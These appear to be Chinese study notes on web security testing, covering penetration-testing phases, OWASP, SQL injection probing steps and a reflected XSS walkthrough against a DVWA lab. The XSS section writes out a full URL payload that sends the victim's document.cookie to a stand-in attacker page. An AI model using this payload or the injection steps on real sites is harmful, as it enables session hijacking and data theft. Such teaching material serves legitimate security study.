web安全測試
web安全測試是指:
檢驗web産品抵抗網絡攻擊能力的一個過程
web攻擊兩個特點:1.影響範圍廣;2.經濟損失大
安全測試的三種方式
-
代碼靜态掃描
工具:Fortify,sonarqube等
-
記憶體掃描
可以使用防毒軟體
-
黑盒動态測試(也叫滲透測試)
模拟黑客對系統進行攻擊
滲透測試三個階段(過程)
-
收集資訊
比如收集ip位址、作業系統、中間件、版本号、資料庫類型等等
-
發現漏洞、驗證漏洞
開始發起攻擊
- 利用漏洞
滲透測試的兩個特點
- 滲透測試是個逐漸滲透的過程
-
不能影響業務系統的正常運作
安全測試的過程可能會破壞正常系統的運作,是以一般需要在測試環境中進行滲透測試,但也有在生産環境下進行滲透測試的情況
OWASP
OWASP是一個網絡安全組織
OWASP TOP 10
漏洞一:SQL注入
注入攻擊過程
-
尋找注入點
如?id=1後面加單引号或雙引号,如果報錯說明存在注入點
- 判斷資料庫類型
-
端口掃描判斷
不太靠譜,工具容易被系統屏蔽,資料庫端口号可以更改
使用工具:nmap
oracle端口号為1521,sql sever端口号為1433,mysql端口号為:3306
-
通過報錯資訊判斷
如果報錯資訊不在螢幕輸出,就看不到了
-
通過工具判斷
比較靠譜
sqlmap
-
-
判斷注入類型
多加一個單引号,肯定報錯,
然後再在新加的單引号後面加一個#号 (%23)
如果報錯,那麼就是數字型
-
判斷查詢列數
使用order by+數字,判斷目前表列數
- 尋找顯示位
- 執行注入操作
漏洞二:XSS攻擊
跨站腳本攻擊,通過讓使用者在遊覽器執行黑客的JS腳本,來擷取使用者資訊
步驟:
- 構造一個黑客網站
- 構造一個用于攻擊的URL
http://localhost/DVWA-master/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.location=%27http://localhost/xss-test/cookie.php%3fcookie%3d%27%2bdocument.cookie%3C%2Fscript%3E#
- 誘使受害者通路該連結
- 黑客的js被觸發,擷取受害者的cookie資訊